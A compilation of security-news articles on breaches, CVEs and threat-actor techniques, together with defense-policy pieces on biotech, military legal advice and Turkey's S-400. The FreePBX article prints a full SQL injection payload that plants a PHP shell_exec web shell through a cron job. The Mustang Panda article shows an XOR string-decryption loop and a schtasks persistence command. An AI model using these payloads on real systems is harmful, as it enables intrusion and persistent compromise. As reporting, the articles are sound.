• The popular communication platform Discord is facing an extortion attempt following a significant data breach at one of its third-party customer service providers, Zendesk.

    Threat actors claim to have stolen 1.5 terabytes of sensitive data, including over 2.1 million government-issued identification photos used for age verification.

    While Discord confirms the breach, it disputes the scale of the incident, stating that approximately 70,000 users had their ID photos exposed.

    The breach, which occurred on September 20, 2025, did not compromise Discord’s own servers but instead targeted its customer support systems managed by the third-party vendor.

    The attackers reportedly gained access for 58 hours by compromising the account of a support agent employed by an outsourced business process provider.

    A notorious cybercrime group known as Scattered Lapsus$ Hunters (SLH) has claimed responsibility, taunting the company publicly while attempting to secure a ransom.

    The compromised information is extensive and primarily affects users who interacted with Discord’s Customer Support or Trust & Safety teams.

    The stolen data includes names, Discord usernames, email addresses, and limited billing details such as payment type and the last four digits of credit card numbers. Additionally, messages exchanged with customer service agents and user IP addresses were exposed.

    The most alarming aspect of the breach is the theft of government-ID images, such as driver’s licenses and passports, which were submitted by users to appeal age-related account restrictions.

    The attackers claim to possess 2,185,151 of these photos, a figure Discord has labeled as “inaccurate” and part of the extortion effort. The hackers allege the data haul affects 5.5 million unique users across 8.4 million support tickets.

    In contrast, Discord maintains that its investigation has identified around 70,000 affected users globally whose IDs may have been exposed.

    Discord has stated it will not pay the ransom demanded by the cybercriminals. Upon discovering the incident, the company immediately revoked the compromised vendor’s access to its ticketing system and terminated its partnership with them.

    Discord has launched an internal investigation, engaged a leading computer forensics firm, and is collaborating with law enforcement and data protection authorities to address the attack.

    The company is in the process of notifying all affected users via email from the address noreply@discord.com and has warned users that it will not contact them through any other channel regarding this matter.

    The notification email will specify if a user’s government ID was part of the compromised data. Discord has assured its community that the breach did not expose full credit card numbers, passwords, or private messages and activity outside of customer support interactions.

    This incident highlights the growing threat of supply chain attacks, where attackers target less secure third-party partners to access the data of larger organizations.

    The incident is ongoing, and the full impact will depend on whether the threat actors follow through on their threat to release the stolen data.

    Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today

    The post Discord Data Breach – 1.5 TB of Data and 2 Million Government ID Photos Extorted appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CrowdStrike has disclosed and released patches for two medium-severity vulnerabilities in its Falcon sensor for Windows that could allow an attacker to delete arbitrary files.

    The security vulnerabilities, designated as CVE-2025-42701 and CVE-2025-42706, require an attacker to have already gained the ability to execute code on a target system.

    The company has stated that there is no evidence of these vulnerabilities being exploited in the wild and that fixes are available for all affected customers.

    CrowdStrike Falcon Windows Sensor Vulnerability

    The two vulnerabilities originate from different types of weaknesses within the Falcon sensor software.

    The first, CVE-2025-42701, is a Time-of-check Time-of-use (TOCTOU) race condition, categorized under CWE-367. This flaw has been assigned a CVSS 3.1 score of 5.6 (Medium).

    The second, CVE-2025-42706, is a logic error related to origin validation (CWE-346) and has a slightly higher CVSS 3.1 score of 6.5 (Medium).

    Both vulnerabilities provide a pathway for a threat actor who has already compromised a system to escalate their impact. By exploiting these issues, an attacker could delete arbitrary files on the host system.

    This could lead to significant stability or functionality problems with the operating system, other installed software, or even the CrowdStrike Falcon sensor itself, potentially disrupting security monitoring.

    It is important to note that these are not remote code execution vulnerabilities and cannot be used for initial access.

    The vulnerabilities impact the CrowdStrike Falcon sensor for Windows versions 7.28 and earlier. Specifically, this includes builds up to 7.28.20006, 7.27.19907, 7.26.19811, 7.25.19706, and 7.24.19607.

    For customers running older Windows 7 or Windows Server 2008 R2 systems, sensor version 7.16.18635 and earlier are also affected. These issues do not impact the Falcon sensors for macOS and Linux.

    CrowdStrike has released fixes across multiple sensor versions to address the flaws. The issues are resolved in the latest Falcon sensor for Windows, version 7.29.

    Additionally, hotfixes have been issued for versions 7.28 (7.28.20008), 7.27 (7.27.19909), 7.26 (7.26.19813), 7.25 (7.25.19707), and 7.24 (7.24.19608).

    A specific hotfix, 7.16.18637, is available for the affected Windows 7 and 2008 R2 systems. Customers are strongly advised to upgrade all Windows hosts running impacted sensor versions to a patched release.

    Affected VersionPatched Version
    7.28.200067.28.20008 and later
    7.27.199077.27.19909
    7.26.19811 & 7.26.198097.26.19813
    7.25.197067.25.19707
    7.24.19607 and earlier7.24.19608
    7.16.18635 and earlier (WIN7/2008 R2 only)7.16.18637 (WIN7/2008 R2 only)

    The security issues were identified internally by CrowdStrike as part of its comprehensive security posture management and through its longstanding bug bounty program, which encourages security researchers to find and report vulnerabilities.

    In its advisory, the company confirmed that its threat hunting and intelligence teams are actively monitoring for any attempts to exploit these vulnerabilities.

    To date, no such activity has been detected. The concurrent release of the vulnerability details and the corresponding patches ensures that defenders have the necessary tools to remediate the issue before it can be widely abused by threat actors.

    CrowdStrike has also provided customers with a query they can use to identify impacted hosts within their environment, facilitating a more rapid and targeted remediation process.

    Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today

    The post CrowdStrike Falcon Windows Sensor Vulnerability Enables Code Execution and File Deletion appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical SQL injection vulnerability in FreePBX has emerged as a significant threat to VoIP infrastructure worldwide, enabling attackers to manipulate database contents and achieve arbitrary code execution.

    FreePBX, a widely deployed PBX system built around the open-source Asterisk VoIP platform, provides organizations with web-based administrative capabilities for managing telecommunications infrastructure.

    The vulnerability, designated as CVE-2025-57819, allows malicious actors to inject SQL commands through vulnerable web application parameters, specifically targeting the system’s database management functions.

    Threat actors have been actively exploiting this vulnerability to compromise FreePBX installations through sophisticated database manipulation techniques.

    The attack vector leverages the system’s ajax.php endpoint, where inadequate input sanitization permits SQL injection through the “brand” parameter.

    Attackers craft malicious GET requests containing SQL payloads that insert unauthorized entries into the cron_jobs database table, effectively establishing persistent access mechanisms within the compromised system.

    Internet Storm Center analysts identified this vulnerability in active exploitation campaigns, observing attackers utilizing the flaw to achieve complete system compromise.

    The exploitation attempts demonstrate advanced techniques that extend beyond simple database manipulation, incorporating elements of persistence and stealth to maintain unauthorized access while avoiding detection.

    Database Manipulation and Code Execution Mechanism

    The exploitation methodology involves injecting carefully crafted SQL statements into the FreePBX database through the vulnerable brand parameter in ajax.php requests.

    A typical exploit payload appears as:-

    GET /admin/ajax[.]php?module=FreePBX\\modules\\endpoint\\ajax&command=model&template=x&model=model&brand=x' ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d ]/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

    The malicious payload inserts a new entry into the cron_jobs table, which FreePBX utilizes for scheduled task management. The base64-encoded command, when decoded, reveals a PHP script containing:-

    [ [?] php header ( 'x_poc: CVE-2025-57819'); echo [shell _exec] (' uname - a'); unlink (__ [FILE] __); ? ]

    This technique transforms database manipulation into direct code execution by exploiting FreePBX’s cron job management system, creating web-accessible PHP files that execute system commands while implementing self-deletion mechanisms to evade forensic analysis.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post FreePBX SQL Injection Vulnerability Exploited to Modify The Database appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new threat group calling itself Crimson Collective has emerged as a significant cybersecurity concern, targeting Amazon Web Services (AWS) cloud environments with sophisticated data exfiltration and extortion campaigns.

    The group has recently claimed responsibility for attacking Red Hat, asserting they successfully compromised and stole private repositories from Red Hat’s GitLab infrastructure.

    This development represents a concerning escalation in cloud-focused cybercrime, highlighting the evolving landscape of threats facing organizations operating in cloud environments.

    The Crimson Collective employs a methodical approach to breach AWS infrastructure, beginning with the exploitation of leaked long-term access keys before escalating privileges through IAM account manipulation.

    Their operations demonstrate advanced knowledge of AWS services and security configurations, enabling them to navigate complex cloud architectures while maintaining persistence across compromised environments.

    The group’s activities have been concentrated on collecting and exfiltrating databases, project repositories, and other valuable organizational data, placing both corporate intellectual property and customer information at significant risk.

    Over recent weeks, security researchers have documented increased activity from this threat actor across multiple AWS environments, with documented cases occurring throughout September.

    The group operates from multiple IP addresses and maintains presence across several compromised accounts within the same target environment, suggesting a coordinated multi-operator structure.

    Diagram of the attack (Source – Rapid7)

    Their extortion notes reference themselves using plural pronouns, indicating multiple individuals collaborate in these operations, though the precise composition and structure of the group remains unclear.

    Rapid7 analysts identified the malware and its operational patterns through comprehensive analysis of CloudTrail logs and behavioral indicators across affected environments.

    Their research revealed that Crimson Collective consistently employs the open-source tool TruffleHog as their primary method for discovering compromised AWS credentials in code repositories and storage locations.

    Technical Exploitation Methods

    The group’s technical methodology centers on leveraging TruffleHog, a legitimate security tool designed to identify exposed credentials in various storage locations.

    When TruffleHog discovers valid AWS credentials, it authenticates using the GetCallerIdentity API call to verify credential validity.

    Analysis of CloudTrail logs consistently shows the TruffleHog user agent as the initial indicator across all compromised accounts, providing security teams with a clear detection opportunity.

    Following successful credential validation, Crimson Collective establishes persistence through systematic user creation and privilege escalation.

    They execute CreateUser API calls followed by CreateLoginProfile to establish password authentication, then generate additional access keys using CreateAccessKey calls.

    The group attempts these persistence mechanisms across every compromised account, though accounts lacking sufficient privileges are either abandoned or subjected to SimulatePrincipalPolicy calls to assess available permissions.

    When successful in creating new users, the threat actors immediately escalate privileges by attaching the arn:aws:iam::aws:policy/AdministratorAccess policy through AttachUserPolicy API calls.

    This AWS-managed policy grants comprehensive access to all AWS services and resources, providing attackers with unrestricted control over the compromised environment for subsequent data exfiltration operations.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Crimson Collective Leverages AWS Services to Exfiltrate Sensitive Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated new breed of ransomware attacks is leveraging legitimate database commands to compromise organizations worldwide, bypassing traditional security measures through “malware-less” operations.

    Unlike conventional ransomware that encrypts files using malicious binaries, threat actors are exploiting exposed database services by abusing standard database functionality to steal, wipe, and ransom critical data.

    The attack methodology represents a significant evolution in cybercriminal tactics, with attackers targeting Internet-facing database servers configured with weak passwords or no authentication.

    This malicious activity has been observed across multiple database platforms, including MySQL, PostgreSQL, MongoDB, Hadoop, CouchDB, and Elasticsearch. Attackers connect remotely to these servers, copy data to external locations, execute destructive commands to wipe databases, and leave ransom notes stored directly within the compromised database structures.

    This approach has proven particularly effective at evading detection because no malicious binary is ever deployed on the target system.

    The damage is accomplished entirely through legitimate database commands, making it difficult for conventional endpoint security solutions to identify the compromise.

    The ransom tactic has evolved from isolated incidents into full-scale automated campaigns, with specialized bots continuously scanning the Internet for misconfigured databases.

    Wiz.io researchers identified that these attacks have grown exponentially since their initial observation in February 2017, when researchers from Rapid7 first documented thousands of open databases being hijacked in bulk operations.

    Today’s threat actors operate sophisticated automated systems capable of compromising newly exposed targets within hours or minutes of them coming online.

    The ease of automation and potential for immediate profits has made malware-less database ransomware a persistent and growing threat to organizations globally.

    Attack Execution and Command Exploitation

    The technical execution of these attacks follows a methodical approach that maximizes both stealth and effectiveness.

    Attackers begin operations with Internet-wide scanning for exposed database ports, specifically targeting port 3306 for MySQL and port 5432 for PostgreSQL servers.

    Ransom note (Source – Wiz.io)

    Once potential targets are identified, they employ fingerprinting techniques to confirm the services are genuine database servers rather than honeypots or other decoy systems.

    Authentication bypass represents a critical phase where attackers test for missing authentication controls, attempt default username and password combinations, and execute brute-force attacks against weak credentials.

    Upon successful authentication, the attack proceeds with data extraction where attackers sample small portions of data to assess value and confirm database access.

    The destructive phase utilizes legitimate SQL commands such as DROP DATABASE for complete database removal or bulk DELETE operations to systematically erase data.

    In relational databases like PostgreSQL, attackers create new tables with names such as RECOVER_YOUR_DATA or README_TO_RECOVER and insert ransom notes as table rows.

    For NoSQL databases like MongoDB, the process involves creating new collections with indicative names and inserting ransom notes as documents.

    A captured MongoDB session demonstrates the attack progression: mongosh "mongodb://target:27017/" followed by database enumeration commands like show dbs to identify valuable targets.

    The ransom note insertion typically contains messages such as “All your data is backed up. You must pay 0.043 BTC to recover it.

    After 48 hours expiration we will leak and expose all your data.” These legitimate database operations make detection challenging, as the commands appear as normal administrative activities to monitoring systems.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Hackers Actively Compromising Databases Using Legitimate Commands appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The U.S. is falling behind in biotechnology development, Sen. Todd Young, R-Ind., said Wednesday—adding that he and other lawmakers are working to help the country catch up with China’s push to incorporate technologies like gene editing for human performance on the battlefield.

    As the Trump administration slashes scientific research funding, Young and his colleagues are hoping to impress upon the executive branch the necessity of biotech as not just a national-security priority, but as an economic driver for its voter strongholds. 

    “One general category in which the Chinese, in particular, are out-classing us, is in bio-manufacturing, industrial applications of biotech – new materials, for example – and new life-saving compounds that could be a great utility to warfighters,” Young said at an event hosted by the With Honor Institute.

    An April report by Young’s National Security Commission on Emerging Biotechnology made 49 recommendations for how the U.S. can invest in and use biotech in defense.

    “Biological sensors could detect pathogens or chemical threats in real time, creating a dynamic and resilient system for battlefield awareness,” the report argued. “Biotechnology also promises new advantages in stealth and mobility. Dynamic biological camouflage, for instance, could shield warfighters from thermal detection, while wearable biosensors could adjust mission parameters based on real-time physiological data.”

    There’s also the possibility of shelf-stable blood products for combat lifesaving, Young said, and “other materials that might actually be incorporated into our weapons systems in various ways.”

    There are concerns in Congress about the administration’s cuts to science funding, including $4 billion from universities, hospitals and other institutions.  

    “I'm deeply, deeply alarmed by what's happening in our basic science and research sectors,” said Rep. Chrissy Houlahan, D-Pa., a co-founder of the BIOTech Caucus. “It's a chilling effect at the business level and at the individual science levels. It just doesn't make any sense, that if we think we need to lead in manufacturing or lead in technology, why would we be blowing up the basic research that drives that?”

    Houlahan and her colleagues on the House and Senate armed services committees have inserted a host of biotechnology measures into the most recent National Defense Authorization Act bill, including a mandate that the Pentagon create an official strategy for its efforts in the field.

    Both Young and Houlahan pointed to the CHIPS and Science Act, a signature piece of Biden administration legislation, as a promising example of bipartisan support for investment in U.S. technology independence.

    “The administration clearly has proven from the CHIPS Act that they can support industrial policy as long as they put their own signature on it,” Young said. “And in this case, they have an opportunity to stand up a program which will disproportionately benefit, from an economic standpoint, farm country USA.”

    Opportunities for this type of manufacturing in states like his own Indiana, Young added, are “enormous.”

    “They campaigned on restoring a golden age of innovation. They campaigned on a golden age of manufacturing. They particularly tried to connect with overlooked, under-appreciated people in rural America, and electorally, they disproportionately benefited from the support and encouragement of what was once disparagingly called flyover country,” Young said. “I will make a political argument, along with the policy argument, that they need to be attentive to this, otherwise another party will take the narrative and become the party of championing rural America and bio manufacturing.”

    While the Trump administration has spent much of its first months in office “clearing” what it believed are the excesses of the federal government, Young added, the next step is to put forth a vision for building.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • National-security-law experts worry that guidance from the military’s top legal minds is being ignored by the Trump administration, which is pushing troops into new legal territory with deployments to U.S. cities and strikes on alleged drug-runners abroad.

    "One of the things I fear might be happening here is that the judge advocates in this instance may be providing proper means and methods advice, but I sense that the administration has gone to the Department of Justice and asked the Office of Legal Counsel to override whatever advice is being given by the judge advocates,” James Baker, a law professor at Syracuse University and former chief judge of the U.S. Court of Appeals for the Armed Forces, said Wednesday during a Center for a New American Security event.

    Baker and James McPherson, a retired rear admiral and former Navy JAG who served as Army undersecretary during Trump's first term, told attendees that the military's lawyers have historically been crucial for making sound decisions during operations. But, in February, Defense Secretary Pete Hegseth fired the Air Force, Army and Navy’s top judge advocates general. Hegseth told reporters their dismissals were necessary to clear "roadblocks to orders that are given by a commander in chief." 

    Baker and McPherson’s concerns follow a new report that a classified legal opinion from the Department of Justice has justified continued strikes on alleged cartel members. 

    McPherson said that if he was put in the difficult position of the JAG advising the commander on the cartel strikes, he would take note of everything and offer that officer a way out of the situation, too.

    “If I felt that he was being given advice that was not sound and not legal, I would document that myself,” McPherson said, adding he’d also tell that commander he’d draft legal guidance to his superiors “‘that will protect you in the future if some of this comes back to haunt you.’”

    In the early hours of his second term, Trump signed an executive order designating certain cartels as terrorist organizations. On Oct. 2, the administration sent a memo to Congress declaring that the U.S. is in an “armed conflict” with the groups.

    Baker poked holes in that logic. He said the labels alone don’t seem to be enough to support the militarized action. 

    “The problem here seems to be reverse engineering,” Baker said. “There's no armed group and ongoing, consistent, violent hostilities. I'm not seeing it.”

    In addition to the cartel strikes, a flurry of legal challenges have been filed in response to President Trump’s deployments of National Guard troops to Chicago, Portland, Oregon, and Memphis. Similar deployments earlier this year to Los Angeles and Washington, D.C., are also the subjects of lawsuits. 

    McPherson said the administration’s legal justifications for the LA deployment were divorced from reality.

    "Well, those facts were not supported by the evidence, ladies and gentlemen. Just simply was not,” he said. “And as a result, the facts that the administration articulated were facts that they found on Truth Social, facts they found in podcasts, facts they found not in evidence on the ground."

    Judge advocates general often provide direct guidance to a commander, steering them between the guardrails in place for military operations. An August survey by the University of Massachusetts Amherst’s Human Security Lab reported that 4 out of 5 service members surveyed understood the Uniform Code of Military Justice’s mandate to disobey unlawful orders.

    Baker said commanders should have the courage to stand up to illegal orders.

    "If the JAG advised it was unlawful, the commander owns it now,” Baker said. “So, if you think there's something that is unlawful, you need to say so. And that's a point when you put your stars on the table."

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The notorious cybercriminal collective known as Scattered Lapsus$ Hunters has escalated their extortion campaign by launching a dedicated leak site to threaten organizations with the exposure of stolen Salesforce data.

    This supergroup, comprised of established threat actors including ShinyHunters, Scattered Spider, and Lapsus$, represents a sophisticated evolution in ransomware-as-a-service operations that targets one of the world’s most widely used customer relationship management platforms.

    The group’s emergence signifies a dangerous consolidation of cybercriminal expertise, combining the technical capabilities and operational knowledge of multiple established threat actors.

    Their coordinated approach demonstrates how modern cybercriminal organizations are becoming increasingly organized and specialized, focusing on high-value targets that can yield substantial ransom payments.

    The collective’s decision to specifically target Salesforce instances reflects their understanding of the platform’s critical business value and the sensitive customer data it contains.

    Operating through the TOR Onion network, their extortionware portal lists compromised Salesforce customers alongside claims of how much data the group has allegedly exfiltrated during their attacks.

    UpGuard analysts noted that the website threatens affected organizations with public data exposure unless payment demands are met, with an initial deadline set for October 10th, 2025.

    The site’s existence marks a troubling milestone in the commercialization of data theft, transforming stolen information into leverage for systematic extortion operations.

    The attack campaign demonstrates sophisticated technical execution across multiple vectors, beginning with social engineering attacks that exploited human vulnerabilities rather than technical flaws.

    The threat actors employed vishing techniques, impersonating IT support personnel to manipulate authorized users into installing malicious Salesforce integrations, providing the attackers with API-level access to target systems.

    OAuth Token Exploitation and Persistence Mechanisms

    The group’s most sophisticated attack vector involved compromising Salesloft’s GitHub repositories and leveraging valid OAuth integration tokens to maintain persistent access to connected Salesforce environments.

    After gaining initial access to Salesloft’s corporate GitHub account through suspected social engineering, the attackers methodically downloaded repository contents, created unauthorized user accounts within the organization, and established custom workflows to facilitate ongoing access.

    The attack progression followed a calculated approach where the threat actors discovered embedded AWS credentials within the compromised repositories, enabling them to access Salesloft Drift’s cloud infrastructure.

    Within this environment, they successfully identified and exfiltrated OAuth tokens belonging to Salesloft Drift clients, effectively transforming legitimate integration credentials into weapons for widespread data theft.

    This technique demonstrates how attackers can leverage the interconnected nature of modern SaaS platforms to achieve lateral movement across multiple organizations through a single compromised integration provider.

    The persistence mechanism relied heavily on the legitimate OAuth authorization framework, making detection particularly challenging for security teams who might not immediately recognize malicious activity disguised as authorized API calls.

    By utilizing valid integration tokens, the attackers could maintain access even if initial entry points were discovered and remediated, highlighting the critical importance of comprehensive token management and monitoring within enterprise environments.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Scattered Lapsus$ Hunters Launched a New Leak Site to Release Data Stolen from Salesforce Instances appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent weeks, cybersecurity analysts have observed a resurgence of the Mustang Panda threat actor deploying a novel DLL side-loading approach to deliver malicious payloads.

    Emerging in June 2025, this campaign leverages politically themed lures targeting Tibetan advocacy groups.

    Victims receive a ZIP archive containing a decoy executable named Voice for the Voiceless Photos.exe alongside a hidden dynamic-link library, libjyy.dll, marked with system and hidden attributes to evade casual inspection.

    When executed, the decoy loads this concealed library via LoadLibraryW, triggering the obscure malware routine beneath the guise of legitimate software.

    Mustang Panda’s attack chain begins with a phishing email carrying the ZIP container. Once opened, Explorer hides the malicious DLL due to its combined “hidden” and “system” flags.

    Hidden DLL in the directory (Source – 0x0d4y.blog)

    The decoy executable then dynamically loads libjyy.dll by resolving the ProcessMain entry point and invoking it.

    At this stage, 0x0d4y Malware Researcher noted that this loader employs dynamic API resolution and string decryption routines to obscure its behavior, making static detection far more challenging.

    After initializing, the malicious DLL decrypts its core payloads, sets up persistence via multiple techniques (registry run keys and scheduled tasks), and finally extracts shellcode for execution.

    The persistence logic first renames both the decoy and the loader to %SystemRoot%\Adobe\licensinghelper.exe and registers a run key named AdobeLicensingHelper under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

    ProcessMain (Source – 0x0d4y.blog)

    It then creates a scheduled task, executed every two minutes, to relaunch the loader with the required Licensing argument.

    Infection Mechanism

    Mustang Panda’s infection mechanism hinges on the DLL side-loading T1574.006 technique, dubbed “ClaimLoader.”

    The loader executable contains minimal import references, instead dynamically decrypting API names at runtime.

    A simple XOR routine with key 0x19 decodes encrypted strings before invoking LoadLibraryW and GetProcAddress.

    For example:-

    mov edx, <encrypted_length>
    mov ecx, <encrypted_string_address>
    ; XOR decryption loop
    decrypt_loop:
      mov al, [ecx]
      xor al, 0x19
      mov [ecx], al
      inc ecx
      dec edx
      jnz decrypt_loop
    ; After decryption, load API dynamically
    push <decrypted_string_address>
    call decryptstrloadapi
    call eax  ; resolved API call

    This code snippet illustrates how the loader avoids static imports and hides its true intentions until execution.

    Once the real payload library is loaded, it uses a secondary custom XOR algorithm—cycling through a four-byte key array [0x01, 0x02, 0x03, 0x04]—to decrypt a Schtasks command string in memory.

    The decoded command schedules the loader to run periodically:-

    schtasks /Create /TN AdobeExperienceManager /SC MINUTE /MO 2 /TR "C:\Windows\Adobe\licensinghelper.exe Licensing" /F

    Following these steps, the loader allocates executable memory via VirtualAlloc, copies shellcode, and abuses the EnumFontsW callback mechanism to execute it.

    The shellcode then performs API hashing to resolve network functions and exfiltrate system data to a command-and-control server.

    Through these layered techniques, Mustang Panda remains especially elusive, blending well-known Windows APIs with dynamic loading and obfuscation to thwart traditional endpoint defenses.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Mustang Panda Using New DLL Side-Loading Technique to Deliver Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • By most accounts, President Trump and President Erdogan had a productive meeting in the White House last month. Several major business deals were agreed, including cooperation on civilian nuclear energy. Russia’s invasion of Ukraine and the future of Syria were also on the agenda.

    Another topic that received considerable attention was U.S.-Turkish defense cooperation. In recent years, Turkey’s domestic defense industry has gone global. Turkish weapons—especially drones—are sought after from Asia to Africa to Europe. While U.S.-Turkish defense cooperation remains healthy, there is plenty of room for growth. But one sticking point still needs to be resolved to take the relationship to the next level: Turkey’s acquisition of the Russian-made S-400 air defense system and its subsequent expulsion from the F-35 Joint Strike Fighter program.

    In 2015, Turkey shot down a Russian fighter jet that strayed into its airspace from Syria. At the time, the fighting in Syria was threatening to spill into Turkey, and Ankara faced a genuine air-defense problem. The problem was so acute that NATO deployed Patriot missile batteries under Operation Active Fence along Turkey’s southern border to help secure the skies. Around the same time, Turkey asked the United States for permission to buy Patriots of its own. Talks faltered over Ankara’s insistence on licensed production and technology transfer, which Washington was unwilling to grant. This pushed Turkey to look elsewhere—eventually to Russia’s S-400.

    By 2017, Turkey had placed the order for the S-400, and two years later, it had taken delivery of the system. Legitimate concerns were raised in the United States about whether a NATO member operating such an advanced Russian system should simultaneously fly the alliance’s most advanced fifth-generation fighter jet; the main fear was that the radar—and ultimately Moscow—might gather sensitive data about the jet’s networks, performance, and signatures. Later that year, Turkey was formally ejected from the F-35 program.

    Even so, Turkey wisely treaded carefully with its new acquisition. It has conducted only one live test-fire exercise in 2020 and the system has remained inactive in a state of low readiness since. Last year, Turkish Defense Minister Yaşar Güler said that “the threat would have to escalate to a very high level, an air attack, for us to use the S-400.” At a time when Turkey has been making rapid advancements in its own domestically produced air-defense systems, it has decided not to incorporate the S-400 into its “Steel Dome” air-defense-network project.

    The S-400 issue remains the main obstacle to closer U.S.-Turkish defense relations. A few potential solutions have been floated. One idea is to mimic the arrangement for the S-300 system that Greece acquired from Cyprus in 2007. Usually kept in storage on Crete, the S-300 was occasionally exercised but not used for day-to-day air-defense operations.

    Others have suggested that Turkey could sell the system to one of the few other countries that have purchased the S-400 from Russia, or even sell it back to Moscow. Still others have proposed that Turkey donate or sell the system to Ukraine. While Ankara has quietly provided Kyiv with significant military hardware, a highly public and controversial transfer of the S-400 would likely be a step too far. Meanwhile, at least one news outlet recently suggested that talks are underway on a deal that would see Turkey render the S-400 “inoperable” in exchange for a return to the F-35 fold.

    There is yet one more one creative albeit unorthodox option worth exploring: the so-called “Nakhchivan Solution.”

    Nakhchivan is an exclave of Azerbaijan, bordered by Armenia to the north and Iran to the south, and sharing a short five-mile border with Turkey. Turkey and Azerbaijan routinely conduct joint military exercises. Under the Nakhchivan Solution, Turkey would deploy its S-400 system to Nakhchivan for such an exercise—and then simply leave it there in a deactivated or in a mothballed state, with Turkish crews rotating in and out as needed for maintenance.

    Furthermore, this arrangement would remove the system from Turkish territory, satisfying U.S. and NATO concerns, while keeping it close enough in allied Azerbaijan that it could quickly return if ever required. This would not be the sale or transfer of the weapon system to Azerbaijani ownership. So in this scenario, any export restrictions that Russia might have placed on the S-400 would not apply. Turkey would continue to own and maintain the S-400, but do so outside its borders. In parallel, Turkey should then be brought back into the F-35 program and allowed to buy Patriot missiles.

    Considering the lack of creative solutions after more than half a decade, this proposal makes sense for three reasons.

    First, it would be consistent with the deep and expanding level of defense cooperation between Azerbaijan and Turkey. The popular expression Bir millet, iki devlet (“One nation, two states”) underscores the cultural, historical, and linguistic ties binding the two countries. The 1992 Military Training Cooperation Agreement laid the foundation for modern Azerbaijani-Turkish military relations, while the 2010 Agreement on Strategic Partnership and Mutual Assistance further deepened cooperation. The 2021 Shusha Declaration elevated bilateral ties to a higher level, emphasizing the security dimension of the relationship. Furthermore, deploying the S-400 to Nakhchivan would be in the spirit of the 1921 Treaty of Kars, commonly interpreted as offering Turkey a de facto protector status of Nakhchivan.

    Second, the two regional powers most likely to object—Russia and Iran—are either too weak or too distracted to respond effectively. Iran may dislike the presence of such a system on its northern border, but in practice, there is nothing preventing Turkey from deploying the S-400 close to the Iranian frontier on its own territory right now. Anyway, Iran has been left too weak to do anything beyond complain. Meanwhile, Russia’s influence in the South Caucasus is clearly waning, as evidenced by the recent White House-led peace initiative between Armenia and Azerbaijan. Moscow is also unlikely to have the capacity to block such a deployment. Baku’s own relations with Moscow are at a low point, so there will be less concern by Azerbaijan to consider Russia’s anxieties about such a move. As for Azerbaijan, it would be a winner in this scenario. Helping the U.S. break the impasse over the S-400 issue would be viewed favorably not only in the White House but across NATO’s capitals too.  

    Finally, perhaps American policymakers should take a more relaxed view of the lethality and effectiveness of the S-400. Although it has shown to be a capable platform in Ukraine, it has not lived up to the hype. The exact number is impossible to know, but open-source reporting documents multiple Ukrainian strikes that destroyed or disabled several S-400 batteries. Furthermore, Israeli F-35s and the S-400 have already operated in the same battlespace in Syria, where the stealthy F-35 has proved quite effective against the Russian air defense system.

    It has now been six years since Turkey took delivery of the S-400 and was ejected from the F-35 program. The time has come to resolve this issue in a way that satisfies all parties while elevating the U.S.-Turkish bilateral relationship to the next level. If such a solution could be announced in advance of the next NATO summit—set to be held in Turkey next July—it would be a welcome development for the transatlantic community. Now is the time for new and creative ideas.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶